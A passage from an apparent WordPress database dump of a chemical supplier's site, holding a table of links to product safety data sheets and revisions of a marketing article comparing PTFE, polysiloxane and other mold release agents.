href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/114D-17.pdf">MS-114D </a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/04/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/3140-1.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/530N-17.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2017/01/538N-17.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-06-15 14:56:01', '2017-06-15 14:56:01', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4578, 3, '2017-06-16 15:37:57', '0000-00-00 00:00:00', '', 'Mold Release for Polyurethane', '', 'draft', 'closed', 'closed', '', '', '', '', '2017-06-16 15:37:57', '2017-06-16 15:37:57', '', 0, 'https://www.miller-stephenson.com/?p=4578', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (4579, 3, '2017-06-15 15:42:01', '2017-06-15 15:42:01', '<h2>Mold Release Agent: Which is right for you?</h2>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agent</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agent solutions (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agent chemistries generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 550-600 F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion resistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and transfer can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n 	<li><strong><a href="https://en.wikipedia.org/wiki/Release_agent">Understanding Release Agents</a></strong></li>\r\n</ul>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2017-06-15 15:42:01', '2017-06-15 15:42:01', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4580, 3, '2017-06-15 15:43:02', '2017-06-15 15:43:02', '<h2>Mold Release Agent: Which is right for you?</h2>\r\nMold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agent are available and which variant would compliment their production method.  There are several distinct release agents categories: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Reactive polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason, manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and reactive polysiloxanes.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release agent solutions for it customers, hence our companies specializes in providing advanced release chemistry. Our company is 100% back-integrated meaning our manufacturing, inventory, and quality are maintained regardless of fluctuations in the market.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n<h3><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Dry Film Mold Release Agent</strong></a></h3>\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong>[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agent solutions (MS-122 and MS-143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform dry, thin films that exhibit excellent surface adhesion and durability. Miller-Stephenson PTFE release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.\r\n\r\nProduction engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. Our PTFE release agents are particular effective in potting and casting molding operations, specifically with electronic potting and casting as PTFE\'s chemical inertness and low-transfer will not interfere with sensitive electronics. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n<h3><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">Reactive polysiloxanes</a> (ReleaSys™) Mold Release Agent</strong></h3>\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> <strong><a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys</a></strong> excels are molding of large composite structures, yielding efficient release, cycle after cycle.[/caption]\r\n\r\nReactive polysiloxanes are the newest generation of mold release agent, designed to crosslink and bind to the mold surface.  <strong>These semi-permanent mold release agent chemistries generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.</strong>  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 550-600 F. Other reactive siloxanes provide a rapid cure, even at room temperature, with a minimum reduction in durability and abrasion resistance.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in irregular curing and transfer can occur.  Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.\r\n\r\nMiller-Stephenson\'s new <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/semi-permanent-release-agents/">ReleaSys™ product</a></strong> line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys™ is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n<h3>Innovative Chemistry, Superior Cost-Effectiveness, and Unmatched Technical Service</h3>\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber 